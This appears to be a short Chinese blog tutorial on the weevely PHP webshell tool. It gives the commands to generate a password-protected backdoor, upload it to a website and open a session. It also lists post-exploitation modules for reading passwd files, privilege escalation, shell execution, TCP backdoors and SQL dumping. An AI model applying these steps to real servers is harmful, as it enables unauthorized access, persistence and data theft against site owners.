简介
weevely 属于php 的 webshell 工具。但相较于 webacoo ,weevely 的功能更加强大,同时对于webshell的连接设立了密码选项!并且携带了大量的管理模块,为渗透带来了更多的惊喜与便利.
使用步骤:
第一步
[email protected]# weevely generate [password] /root/xx.php #//生成xx.php的backdoor 密码为password
第二步
upload backdoor to website and get backdoor url path
第三步
establish session with website
weevely [backdoor url path] password
其强大的管理模块!使用 help 命令来查看可用模块
:audit_phpconf? 审计PHP配置文件
:audit_suidsgid? 通过SUID和SGID来查找文件
:audit_etcpasswd? 通过其它手段获取PASSWD
:audit_filesystem? 错误权限的审计系统文件
:shell_su 利用SU命令提权
:shell_php? 执行PHP命令
:shell_sh? 执行shell命令
:system_extensions? 收集PHP和web服务器的延伸列表
:system_info? 收集系统信息
:backdoor_tcp 在TCP类端口生成一个后门
:sql_dump 导出数据表
:sql_console 执行SQL查询命令或启动控制台
:net_ifconfig? 获取目标网络地址
:net_proxy? 通过本地HTTP进行代理
:net_scan? TCP端口扫描
:net_curl? 远程执行HTTP请求
:net_phpproxy? 在目标系统安装PHP代理
![kali下中英文输入任意切换[图]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)